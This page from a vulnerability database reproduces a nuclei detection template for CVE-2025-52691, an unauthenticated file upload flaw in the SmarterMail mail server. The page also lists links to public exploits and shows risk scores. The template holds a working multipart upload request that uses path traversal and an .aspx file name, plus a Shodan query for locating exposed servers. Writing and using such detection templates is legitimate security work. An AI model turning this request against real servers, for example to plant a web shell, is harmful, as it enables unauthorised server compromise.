Lucene search
K

SmarterMail - Unrestricted File Upload

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

SmarterMail unauthenticated file upload allows arbitrary uploads to any path, risking code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-52691
30 Dec 202518:21
githubexploit
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Smartertools Smartermail
8 Jan 202611:42
githubexploit
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Smartertools Smartermail
5 Jan 202613:46
githubexploit
GithubExploit
Exploit for CVE-2025-52691
29 Dec 202516:23
githubexploit
GithubExploit
Exploit for CVE-2025-52691
30 Dec 202514:58
githubexploit
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Smartertools Smartermail
23 Jan 202611:48
githubexploit
GithubExploit
Exploit for CVE-2025-52691
30 Dec 202510:24
githubexploit
GithubExploit
Exploit for CVE-2025-52691
30 Dec 202518:37
githubexploit
GithubExploit
Exploit for CVE-2025-52691
30 Dec 202506:13
githubexploit
GithubExploit
Exploit for CVE-2025-52691
31 Dec 202507:01
githubexploit
Rows per page
id: CVE-2025-52691

info:
  name: SmarterMail - Unrestricted File Upload
  author: DhiyaneshDK,watchTowr
  severity: critical
  description: |
    Mail server contains an unrestricted file upload vulnerability allowing unauthenticated attackers to upload arbitrary files to any location, potentially enabling remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  remediation: |
    Update to the latest version of the mail server.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2025,smartermail,file-upload,intrusive,rce,kev,vkev

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'
  file_name: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /api/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="context"

        attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableIdentifier"

        fakeID
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="resumableFilename"

        {{file_name}}.aspx
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="contextData"

        {"guid":"dag/../../{{rand_string}}"}
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="whatever"; filename="{{file_name}}.jpg"

        Detection Artifact Generator
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fileName":'
          - '{"key":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022053050160f6e64ebd3cf5d8cdae07886aebee8f8cb001fb93801a390bec1f32930220526826a2b8a384cc2371de5d5e65d883885438192140b56df9423190fa0f13bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.110
EPSS0.85457
SSVC
9